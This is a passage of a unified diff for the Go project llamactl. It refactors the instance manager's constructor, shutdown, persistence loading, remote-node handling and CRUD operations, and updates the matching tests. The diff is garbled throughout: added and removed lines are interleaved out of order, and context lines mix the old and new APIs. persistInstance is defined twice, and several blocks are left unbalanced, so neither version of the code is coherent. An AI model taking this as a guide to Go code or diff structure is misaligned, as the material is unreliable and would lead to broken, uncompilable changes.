+	instanceLocks sync.Map // map[string]*sync.Mutex - per-instance locks for concurrent operations
 	shutdownOnce  sync.Once
 }
-// NewInstanceManager creates a new instance of InstanceManager.
+// New creates a new instance of InstanceManager.
-func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
+func New(globalConfig *config.AppConfig) InstanceManager {
 	if instancesConfig.TimeoutCheckInterval <= 0 {
 		instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
 	}
 	im := &instanceManager{
 		instances:        make(map[string]*instance.Process),
 		runningInstances: make(map[string]struct{}),
 		ports:            make(map[int]bool),
 		instancesConfig:  instancesConfig,
 		backendsConfig:   backendsConfig,
-		timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
+	if globalConfig.Instances.TimeoutCheckInterval <= 0 {
-		shutdownChan:   make(chan struct{}),
+		globalConfig.Instances.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
 		shutdownDone:   make(chan struct{}),
 	}
 	// Initialize components
 	registry := newInstanceRegistry()
 	// Initialize port allocator
 	portRange := globalConfig.Instances.PortRange
 	ports, err := newPortAllocator(portRange[0], portRange[1])
 	if err != nil {
 		log.Fatalf("Failed to create port allocator: %v", err)
 	}
 	// Initialize persistence
 	persistence, err := newInstancePersister(globalConfig.Instances.InstancesDir)
 	if err != nil {
 		log.Fatalf("Failed to create instance persister: %v", err)
 	}
 	// Initialize remote manager
 	remote := newRemoteManager(globalConfig.Nodes, 30*time.Second)
 	// Create manager instance
 	im := &instanceManager{
 		registry:     registry,
 		ports:        ports,
 		persistence:  persistence,
 		remote:       remote,
 		globalConfig: globalConfig,
 	}
 	// Initialize lifecycle manager (needs reference to manager for Stop/Evict operations)
 	checkInterval := time.Duration(globalConfig.Instances.TimeoutCheckInterval) * time.Minute
 	im.lifecycle = newLifecycleManager(registry, im, checkInterval, true)
 	// Load existing instances from disk
 	if err := im.loadInstances(); err != nil {
 		log.Printf("Error loading instances: %v", err)
 	}
-	// Start the timeout checker goroutine after initialization is complete
+	// Start the lifecycle manager
-	go func() {
+	im.lifecycle.start()
 		defer close(im.shutdownDone)
 		for {
 			select {
 			case <-im.timeoutChecker.C:
 				im.checkAllTimeouts()
 			case <-im.shutdownChan:
 				return // Exit goroutine on shutdown
 			}
 		}
 	}()
 	return im
 }
-func (im *instanceManager) getNextAvailablePort() (int, error) {
+// persistInstance saves an instance using the persistence component
-	portRange := im.instancesConfig.PortRange
+func (im *instanceManager) persistInstance(inst *instance.Instance) error {
-
+	return im.persistence.save(inst)
 	for port := portRange[0]; port <= portRange[1]; port++ {
 		if !im.ports[port] {
 			im.ports[port] = true
 			return port, nil
 		}
 	}
 	return 0, fmt.Errorf("no available ports in the specified range")
 }
 // persistInstance saves an instance to its JSON file
 func (im *instanceManager) persistInstance(instance *instance.Process) error {
 	if im.instancesConfig.InstancesDir == "" {
 		return nil // Persistence disabled
 	}
 	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
 	tempPath := instancePath + ".tmp"
 	// Serialize instance to JSON
 	jsonData, err := json.MarshalIndent(instance, "", "  ")
 	if err != nil {
 		return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
 	}
 	// Write to temporary file first
 	if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
 		return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
 	}
 	// Atomic rename
 	if err := os.Rename(tempPath, instancePath); err != nil {
 		os.Remove(tempPath) // Clean up temp file
 		return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
 	}
 	return nil
 }
 func (im *instanceManager) Shutdown() {
-	im.mu.Lock()
+	im.shutdownOnce.Do(func() {
 		// 1. Stop lifecycle manager (stops timeout checker)
 		im.lifecycle.stop()
-	// Check if already shutdown
+		// 2. Get running instances (no lock needed - registry handles it)
-	if im.isShutdown {
+		running := im.registry.listRunning()
 		im.mu.Unlock()
 		return
 	}
 	im.isShutdown = true
-	// Signal the timeout checker to stop
+		// 3. Stop local instances concurrently
-	close(im.shutdownChan)
+		var wg sync.WaitGroup
-
+		for _, inst := range running {
-	// Create a list of running instances to stop
+			if inst.IsRemote() {
-	var runningInstances []*instance.Process
+				continue // Skip remote instances
 	var runningNames []string
 	for name, inst := range im.instances {
 		if inst.IsRunning() {
 			runningInstances = append(runningInstances, inst)
 			runningNames = append(runningNames, name)
 		}
 	}
 	// Release lock before stopping instances to avoid deadlock
 	im.mu.Unlock()
 	// Wait for the timeout checker goroutine to actually stop
 	<-im.shutdownDone
 	// Now stop the ticker
 	if im.timeoutChecker != nil {
 		im.timeoutChecker.Stop()
 	}
 	// Stop instances without holding the manager lock
 	var wg sync.WaitGroup
 	wg.Add(len(runningInstances))
 	for i, inst := range runningInstances {
 		go func(name string, inst *instance.Process) {
 			defer wg.Done()
 			fmt.Printf("Stopping instance %s...\n", name)
 			// Attempt to stop the instance gracefully
 			if err := inst.Stop(); err != nil {
 				fmt.Printf("Error stopping instance %s: %v\n", name, err)
 			}
-		}(runningNames[i], inst)
+			wg.Add(1)
-	}
+			go func(inst *instance.Instance) {
-
+				defer wg.Done()
-	wg.Wait()
+				fmt.Printf("Stopping instance %s...\n", inst.Name)
-	fmt.Println("All instances stopped.")
+				if err := inst.Stop(); err != nil {
 					fmt.Printf("Error stopping instance %s: %v\n", inst.Name, err)
 				}
 			}(inst)
 		}
 		wg.Wait()
 		fmt.Println("All instances stopped.")
 	})
 }
-// loadInstances restores all instances from disk
+// loadInstances restores all instances from disk using the persistence component
 func (im *instanceManager) loadInstances() error {
-	if im.instancesConfig.InstancesDir == "" {
+	// Load all instances from persistence
-		return nil // Persistence disabled
+	instances, err := im.persistence.loadAll()
 	}
 	// Check if instances directory exists
 	if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
 		return nil // No instances directory, start fresh
 	}
 	// Read all JSON files from instances directory
 	files, err := os.ReadDir(im.instancesConfig.InstancesDir)
 	if err != nil {
-		return fmt.Errorf("failed to read instances directory: %w", err)
+		return fmt.Errorf("failed to load instances: %w", err)
 	}
-	loadedCount := 0
+	if len(instances) == 0 {
-	for _, file := range files {
+		return nil
-		if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
+	}
 	// Process each loaded instance
 	for _, persistedInst := range instances {
 		if err := im.loadInstance(persistedInst); err != nil {
 			log.Printf("Failed to load instance %s: %v", persistedInst.Name, err)
 			continue
 		}
 		instanceName := strings.TrimSuffix(file.Name(), ".json")
 		instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
 		if err := im.loadInstance(instanceName, instancePath); err != nil {
 			log.Printf("Failed to load instance %s: %v", instanceName, err)
 			continue
 		}
 		loadedCount++
 	}
-	if loadedCount > 0 {
+	log.Printf("Loaded %d instances from persistence", len(instances))
-		log.Printf("Loaded %d instances from persistence", loadedCount)
+
-		// Auto-start instances that have auto-restart enabled
+	// Auto-start instances that have auto-restart enabled
-		go im.autoStartInstances()
+	go im.autoStartInstances()
 	}
 	return nil
 }
-// loadInstance loads a single instance from its JSON file
+// loadInstance loads a single persisted instance and adds it to the registry
-func (im *instanceManager) loadInstance(name, path string) error {
+func (im *instanceManager) loadInstance(persistedInst *instance.Instance) error {
-	data, err := os.ReadFile(path)
+	name := persistedInst.Name
-	if err != nil {
+	options := persistedInst.GetOptions()
-		return fmt.Errorf("failed to read instance file: %w", err)
+
 	// Check if this is a remote instance (local node not in the Nodes set)
 	var isRemote bool
 	var nodeName string
 	if options != nil {
 		if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
 			// Get the first node from the set
 			for node := range options.Nodes {
 				nodeName = node
 				isRemote = true
 				break
 			}
 		}
 	}
-	var persistedInstance instance.Process
+	var statusCallback func(oldStatus, newStatus instance.Status)
-	if err := json.Unmarshal(data, &persistedInstance); err != nil {
+	if !isRemote {
-		return fmt.Errorf("failed to unmarshal instance: %w", err)
+		// Only set status callback for local instances
-	}
+		statusCallback = func(oldStatus, newStatus instance.Status) {
-
+			im.onStatusChange(name, oldStatus, newStatus)
-	// Validate the instance name matches the filename
+		}
 	if persistedInstance.Name != name {
 		return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
 	}
 	statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
 		im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
 	}
 	// Create new inst using NewInstance (handles validation, defaults, setup)
-	inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
+	inst := instance.New(name, im.globalConfig, options, statusCallback)
 	// Restore persisted fields that NewInstance doesn't set
-	inst.Created = persistedInstance.Created
+	inst.Created = persistedInst.Created
-	inst.SetStatus(persistedInstance.Status)
+	inst.SetStatus(persistedInst.GetStatus())
-	// Check for port conflicts and add to maps
+	// Handle remote instance mapping
-	if inst.GetPort() > 0 {
+	if isRemote {
-		port := inst.GetPort()
+		// Map instance to node in remote manager
-		if im.ports[port] {
+		if err := im.remote.setInstanceNode(name, nodeName); err != nil {
-			return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
+			return fmt.Errorf("failed to set instance node: %w", err)
 		}
 	} else {
 		// Allocate port for local instances
 		if inst.GetPort() > 0 {
 			port := inst.GetPort()
 			if err := im.ports.allocateSpecific(port, name); err != nil {
 				return fmt.Errorf("port conflict: instance %s wants port %d which is already in use: %w", name, port, err)
 			}
 		}
 		im.ports[port] = true
 	}
-	im.instances[name] = inst
+	// Add instance to registry
 	if err := im.registry.add(inst); err != nil {
 		return fmt.Errorf("failed to add instance to registry: %w", err)
 	}
 	return nil
 }
 // autoStartInstances starts instances that were running when persisted and have auto-restart enabled
 // For instances with auto-restart disabled, it sets their status to Stopped
 func (im *instanceManager) autoStartInstances() {
-	im.mu.RLock()
+	instances := im.registry.list()
-	var instancesToStart []*instance.Process
+
-	for _, inst := range im.instances {
+	var instancesToStart []*instance.Instance
 	var instancesToStop []*instance.Instance
 	for _, inst := range instances {
 		if inst.IsRunning() && // Was running when persisted
 			inst.GetOptions() != nil &&
-			inst.GetOptions().AutoRestart != nil &&
+			inst.GetOptions().AutoRestart != nil {
-			*inst.GetOptions().AutoRestart {
+			if *inst.GetOptions().AutoRestart {
-			instancesToStart = append(instancesToStart, inst)
+				instancesToStart = append(instancesToStart, inst)
 			} else {
 				// Instance was running but auto-restart is disabled, mark as stopped
 				instancesToStop = append(instancesToStop, inst)
 			}
 		}
 	}
 	im.mu.RUnlock()
 	// Stop instances that have auto-restart disabled
 	for _, inst := range instancesToStop {
 		log.Printf("Instance %s was running but auto-restart is disabled, setting status to stopped", inst.Name)
 		inst.SetStatus(instance.Stopped)
 		im.registry.markStopped(inst.Name)
 	}
 	// Start instances that have auto-restart enabled
 	for _, inst := range instancesToStart {
 		log.Printf("Auto-starting instance %s", inst.Name)
 		// Reset running state before starting (since Start() expects stopped instance)
 		inst.SetStatus(instance.Stopped)
-		if err := inst.Start(); err != nil {
+		im.registry.markStopped(inst.Name)
-			log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
+
 		// Check if this is a remote instance
 		if node, exists := im.remote.getNodeForInstance(inst.Name); exists && node != nil {
 			// Remote instance - use remote manager with context
 			ctx := context.Background()
 			if _, err := im.remote.startInstance(ctx, node, inst.Name); err != nil {
 				log.Printf("Failed to auto-start remote instance %s: %v", inst.Name, err)
 			}
 		} else {
 			// Local instance - call Start() directly
 			if err := inst.Start(); err != nil {
 				log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
 			}
 		}
 	}
 }
-func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
+func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.Status) {
 	im.mu.Lock()
 	defer im.mu.Unlock()
 	if newStatus == instance.Running {
-		im.runningInstances[name] = struct{}{}
+		im.registry.markRunning(name)
 	} else {
-		delete(im.runningInstances, name)
+		im.registry.markStopped(name)
 	}
 }
 // getNodeForInstance returns the node configuration for a remote instance
 // Returns nil if the instance is not remote or the node is not found
 func (im *instanceManager) getNodeForInstance(inst *instance.Instance) *config.NodeConfig {
 	if !inst.IsRemote() {
 		return nil
 	}
 	// Check if we have a node mapping in remote manager
 	if nodeConfig, exists := im.remote.getNodeForInstance(inst.Name); exists {
 		return nodeConfig
 	}
 	return nil
 }
 // lockInstance returns the lock for a specific instance, creating one if needed.
 // This allows concurrent operations on different instances while preventing
 // concurrent operations on the same instance.
 func (im *instanceManager) lockInstance(name string) *sync.Mutex {
 	lock, _ := im.instanceLocks.LoadOrStore(name, &sync.Mutex{})
 	return lock.(*sync.Mutex)
 }
 // unlockAndCleanup unlocks the instance lock and removes it from the map.
 // This should only be called when deleting an instance to prevent memory leaks.
 func (im *instanceManager) unlockAndCleanup(name string) {
 	if lock, ok := im.instanceLocks.Load(name); ok {
 		lock.(*sync.Mutex).Unlock()
 		im.instanceLocks.Delete(name)
 	}
 }
--- a/pkg/manager/manager_test.go
+++ b/pkg/manager/manager_test.go
@@ -3,70 +3,28 @@ package manager_test
 import (
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 	"testing"
 )
-func TestNewInstanceManager(t *testing.T) {
+func TestManager_PersistsAndLoadsInstances(t *testing.T) {
 	backendConfig := config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		LogsDir:              "/tmp/test",
 		MaxInstances:         5,
 		DefaultAutoRestart:   true,
 		DefaultMaxRestarts:   3,
 		DefaultRestartDelay:  5,
 		TimeoutCheckInterval: 5,
 	}
 	mgr := manager.NewInstanceManager(backendConfig, cfg)
 	if mgr == nil {
 		t.Fatal("NewInstanceManager returned nil")
 	}
 	// Test initial state
 	instances, err := mgr.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
 	}
 	if len(instances) != 0 {
 		t.Errorf("Expected empty instance list, got %d instances", len(instances))
 	}
 }
 func TestPersistence(t *testing.T) {
 	tempDir := t.TempDir()
 	appConfig := createTestAppConfig(tempDir)
-	backendConfig := config.BackendConfig{
+	// Create instance and check file was created
-		LlamaExecutable: "llama-server",
+	manager1 := manager.New(appConfig)
-		MLXLMExecutable: "mlx_lm.server",
+	options := &instance.Options{
-	}
+		BackendOptions: backends.Options{
-
+			BackendType: backends.BackendTypeLlamaCpp,
-	cfg := config.InstancesConfig{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-		PortRange:            [2]int{8000, 9000},
+				Model: "/path/to/model.gguf",
-		InstancesDir:         tempDir,
+				Port:  8080,
-		MaxInstances:         10,
+			},
 		TimeoutCheckInterval: 5,
 	}
 	// Test instance persistence on creation
 	manager1 := manager.NewInstanceManager(backendConfig, cfg)
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
@@ -75,14 +33,13 @@ func TestPersistence(t *testing.T) {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Check that JSON file was created
 	expectedPath := filepath.Join(tempDir, "test-instance.json")
 	if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
 		t.Errorf("Expected persistence file %s to exist", expectedPath)
 	}
-	// Test loading instances from disk
+	// Load instances from disk
-	manager2 := manager.NewInstanceManager(backendConfig, cfg)
+	manager2 := manager.New(appConfig)
 	instances, err := manager2.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
@@ -93,15 +50,31 @@ func TestPersistence(t *testing.T) {
 	if instances[0].Name != "test-instance" {
 		t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
 	}
 }
-	// Test port map populated from loaded instances (port conflict should be detected)
+func TestDeleteInstance_RemovesPersistenceFile(t *testing.T) {
-	_, err = manager2.CreateInstance("new-instance", options) // Same port
+	tempDir := t.TempDir()
-	if err == nil || !strings.Contains(err.Error(), "port") {
+	appConfig := createTestAppConfig(tempDir)
-		t.Errorf("Expected port conflict error, got: %v", err)
+
 	mgr := manager.New(appConfig)
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
-	// Test file deletion on instance deletion
+	_, err := mgr.CreateInstance("test-instance", options)
-	err = manager2.DeleteInstance("test-instance")
+	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	expectedPath := filepath.Join(tempDir, "test-instance.json")
 	err = mgr.DeleteInstance("test-instance")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
@@ -124,10 +97,12 @@ func TestConcurrentAccess(t *testing.T) {
 		wg.Add(1)
 		go func(index int) {
 			defer wg.Done()
-			options := &instance.CreateInstanceOptions{
+			options := &instance.Options{
-				BackendType: backends.BackendTypeLlamaCpp,
+				BackendOptions: backends.Options{
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+					BackendType: backends.BackendTypeLlamaCpp,
-					Model: "/path/to/model.gguf",
+					LlamaServerOptions: &backends.LlamaServerOptions{
 						Model: "/path/to/model.gguf",
 					},
 				},
 			}
 			instanceName := fmt.Sprintf("concurrent-test-%d", index)
@@ -157,43 +132,58 @@ func TestConcurrentAccess(t *testing.T) {
 	}
 }
-func TestShutdown(t *testing.T) {
+// Helper functions for test configuration
-	mgr := createTestManager()
+func createTestAppConfig(instancesDir string) *config.AppConfig {
-
+	// Use 'sleep' as a test command instead of 'llama-server'
-	// Create test instance
+	// This allows tests to run in CI environments without requiring actual LLM binaries
-	options := &instance.CreateInstanceOptions{
+	// The sleep command will be invoked with model paths and other args, which it ignores
-		BackendType: backends.BackendTypeLlamaCpp,
+	return &config.AppConfig{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+		Backends: config.BackendConfig{
-			Model: "/path/to/model.gguf",
+			LlamaCpp: config.BackendSettings{
 				Command: "sleep",
 			},
 			MLX: config.BackendSettings{
 				Command: "sleep",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			InstancesDir:         instancesDir,
 			LogsDir:              instancesDir,
 			MaxInstances:         10,
 			MaxRunningInstances:  10,
 			DefaultAutoRestart:   true,
 			DefaultMaxRestarts:   3,
 			DefaultRestartDelay:  5,
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
 	_, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Shutdown should not panic
 	mgr.Shutdown()
 	// Multiple shutdowns should not panic
 	mgr.Shutdown()
 }
 // Helper function to create a test manager with standard config
 func createTestManager() manager.InstanceManager {
-	backendConfig := config.BackendConfig{
+	appConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "sleep",
 			},
 			MLX: config.BackendSettings{
 				Command: "sleep",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			LogsDir:              "/tmp/test",
 			MaxInstances:         10,
 			MaxRunningInstances:  10,
 			DefaultAutoRestart:   true,
 			DefaultMaxRestarts:   3,
 			DefaultRestartDelay:  5,
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
-
+	return manager.New(appConfig)
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		LogsDir:              "/tmp/test",
 		MaxInstances:         10,
 		DefaultAutoRestart:   true,
 		DefaultMaxRestarts:   3,
 		DefaultRestartDelay:  5,
 		TimeoutCheckInterval: 5,
 	}
 	return manager.NewInstanceManager(backendConfig, cfg)
 }
--- a/pkg/manager/operations.go
+++ b/pkg/manager/operations.go
@@ -1,159 +1,350 @@
 package manager
 import (
 	"context"
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
-	"llamactl/pkg/validation"
+	"log"
 	"os"
 	"path/filepath"
 )
 type MaxRunningInstancesError error
-// ListInstances returns a list of all instances managed by the instance manager.
+// updateLocalInstanceFromRemote updates the local stub instance with data from the remote instance
-func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
+func (im *instanceManager) updateLocalInstanceFromRemote(localInst *instance.Instance, remoteInst *instance.Instance) {
-	im.mu.RLock()
+	if localInst == nil || remoteInst == nil {
-	defer im.mu.RUnlock()
+		return
 	instances := make([]*instance.Process, 0, len(im.instances))
 	for _, inst := range im.instances {
 		instances = append(instances, inst)
 	}
 	remoteOptions := remoteInst.GetOptions()
 	if remoteOptions == nil {
 		return
 	}
 	// Update the local instance with all remote data
 	localInst.SetOptions(remoteOptions)
 	localInst.SetStatus(remoteInst.GetStatus())
 	localInst.Created = remoteInst.Created
 }
 // ListInstances returns a list of all instances managed by the instance manager.
 // For remote instances, this fetches the live state from remote nodes and updates local stubs.
 func (im *instanceManager) ListInstances() ([]*instance.Instance, error) {
 	instances := im.registry.list()
 	// Update remote instances with live state
 	ctx := context.Background()
 	for _, inst := range instances {
 		if node := im.getNodeForInstance(inst); node != nil {
 			remoteInst, err := im.remote.getInstance(ctx, node, inst.Name)
 			if err != nil {
 				// Log error but continue with stale data
 				// Don't fail the entire list operation due to one remote failure
 				continue
 			}
 			// Update the local stub with all remote data (preserving Nodes)
 			im.updateLocalInstanceFromRemote(inst, remoteInst)
 		}
 	}
 	return instances, nil
 }
 // CreateInstance creates a new instance with the given options and returns it.
 // The instance is initially in a "stopped" state.
-func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
+func (im *instanceManager) CreateInstance(name string, options *instance.Options) (*instance.Instance, error) {
 	if options == nil {
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}
-	name, err := validation.ValidateInstanceName(name)
+	err := options.BackendOptions.ValidateInstanceOptions()
 	if err != nil {
 		return nil, err
 	}
-	err = validation.ValidateInstanceOptions(options)
+	// Check if instance with this name already exists (must be globally unique)
-	if err != nil {
+	if _, exists := im.registry.get(name); exists {
 		return nil, err
 	}
 	im.mu.Lock()
 	defer im.mu.Unlock()
 	// Check max instances limit after acquiring the lock
 	if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
 		return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
 	}
 	// Check if instance with this name already exists
 	if im.instances[name] != nil {
 		return nil, fmt.Errorf("instance with name %s already exists", name)
 	}
-	// Assign and validate port for backend-specific options
+	// Check if this is a remote instance (local node not in the Nodes set)
-	if err := im.assignAndValidatePort(options); err != nil {
+	if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
-		return nil, err
+		// Get the first node from the set
 		var nodeName string
 		for node := range options.Nodes {
 			nodeName = node
 			break
 		}
 		// Create the remote instance on the remote node
 		ctx := context.Background()
 		nodeConfig, exists := im.remote.getNodeForInstance(nodeName)
 		if !exists {
 			// Try to set the node if it doesn't exist yet
 			if err := im.remote.setInstanceNode(name, nodeName); err != nil {
 				return nil, fmt.Errorf("node %s not found", nodeName)
 			}
 			nodeConfig, _ = im.remote.getNodeForInstance(name)
 		}
 		remoteInst, err := im.remote.createInstance(ctx, nodeConfig, name, options)
 		if err != nil {
 			return nil, err
 		}
 		// Create a local stub that preserves the Nodes field for tracking
 		// We keep the original options (with Nodes) so IsRemote() works correctly
 		inst := instance.New(name, im.globalConfig, options, nil)
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Map instance to node
 		if err := im.remote.setInstanceNode(name, nodeName); err != nil {
 			return nil, fmt.Errorf("failed to map instance to node: %w", err)
 		}
 		// Add to registry (doesn't count towards local limits)
 		if err := im.registry.add(inst); err != nil {
 			return nil, fmt.Errorf("failed to add instance to registry: %w", err)
 		}
 		// Persist the remote instance locally for tracking across restarts
 		if err := im.persistInstance(inst); err != nil {
 			// Rollback: remove from registry
 			im.registry.remove(name)
 			return nil, fmt.Errorf("failed to persist remote instance %s: %w", name, err)
 		}
 		return inst, nil
 	}
-	statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
+	// Local instance creation
 	// Check max instances limit for local instances only
 	totalInstances := im.registry.count()
 	remoteCount := 0
 	for _, inst := range im.registry.list() {
 		if inst.IsRemote() {
 			remoteCount++
 		}
 	}
 	localInstanceCount := totalInstances - remoteCount
 	if localInstanceCount >= im.globalConfig.Instances.MaxInstances && im.globalConfig.Instances.MaxInstances != -1 {
 		return nil, fmt.Errorf("maximum number of instances (%d) reached", im.globalConfig.Instances.MaxInstances)
 	}
 	// Assign and validate port for backend-specific options
 	currentPort := im.getPortFromOptions(options)
 	var allocatedPort int
 	if currentPort == 0 {
 		// Allocate a port if not specified
 		allocatedPort, err = im.ports.allocate(name)
 		if err != nil {
 			return nil, fmt.Errorf("failed to allocate port: %w", err)
 		}
 		im.setPortInOptions(options, allocatedPort)
 	} else {
 		// Use the specified port
 		if err := im.ports.allocateSpecific(currentPort, name); err != nil {
 			return nil, fmt.Errorf("port %d is already in use: %w", currentPort, err)
 		}
 		allocatedPort = currentPort
 	}
 	statusCallback := func(oldStatus, newStatus instance.Status) {
 		im.onStatusChange(name, oldStatus, newStatus)
 	}
-	inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
+	inst := instance.New(name, im.globalConfig, options, statusCallback)
 	im.instances[inst.Name] = inst
 	// Add to registry
 	if err := im.registry.add(inst); err != nil {
 		// Rollback: release port
 		im.ports.release(allocatedPort)
 		return nil, fmt.Errorf("failed to add instance to registry: %w", err)
 	}
 	// Persist instance (best-effort, don't fail if persistence fails)
 	if err := im.persistInstance(inst); err != nil {
-		return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
+		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	}
 	return inst, nil
 }
 // GetInstance retrieves an instance by its name.
-func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
+// For remote instances, this fetches the live state from the remote node and updates the local stub.
-	im.mu.RLock()
+func (im *instanceManager) GetInstance(name string) (*instance.Instance, error) {
-	defer im.mu.RUnlock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	return instance, nil
+
 	// Check if instance is remote and fetch live state
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.getInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Return the local stub (preserving Nodes field)
 		return inst, nil
 	}
 	return inst, nil
 }
 // UpdateInstance updates the options of an existing instance and returns it.
 // If the instance is running, it will be restarted to apply the new options.
-func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
+func (im *instanceManager) UpdateInstance(name string, options *instance.Options) (*instance.Instance, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	instance, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
 	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.updateInstance(ctx, node, name, options)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		// Persist the updated remote instance locally
 		if err := im.persistInstance(inst); err != nil {
 			return nil, fmt.Errorf("failed to persist updated remote instance %s: %w", name, err)
 		}
 		return inst, nil
 	}
 	if options == nil {
 		return nil, fmt.Errorf("instance options cannot be nil")
 	}
-	err := validation.ValidateInstanceOptions(options)
+	err := options.BackendOptions.ValidateInstanceOptions()
 	if err != nil {
 		return nil, err
 	}
 	// Lock this specific instance only
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Handle port changes
 	oldPort := inst.GetPort()
 	newPort := im.getPortFromOptions(options)
 	var allocatedPort int
 	if newPort != oldPort {
 		// Port is changing - need to release old and allocate new
 		if newPort == 0 {
 			// Auto-allocate new port
 			allocatedPort, err = im.ports.allocate(name)
 			if err != nil {
 				return nil, fmt.Errorf("failed to allocate new port: %w", err)
 			}
 			im.setPortInOptions(options, allocatedPort)
 		} else {
 			// Use specified port
 			if err := im.ports.allocateSpecific(newPort, name); err != nil {
 				return nil, fmt.Errorf("failed to allocate port %d: %w", newPort, err)
 			}
 			allocatedPort = newPort
 		}
 		// Release old port
 		if oldPort > 0 {
 			if err := im.ports.release(oldPort); err != nil {
 				// Rollback new port allocation
 				im.ports.release(allocatedPort)
 				return nil, fmt.Errorf("failed to release old port %d: %w", oldPort, err)
 			}
 		}
 	}
 	// Check if instance is running before updating options
-	wasRunning := instance.IsRunning()
+	wasRunning := inst.IsRunning()
 	// If the instance is running, stop it first
 	if wasRunning {
-		if err := instance.Stop(); err != nil {
+		if err := inst.Stop(); err != nil {
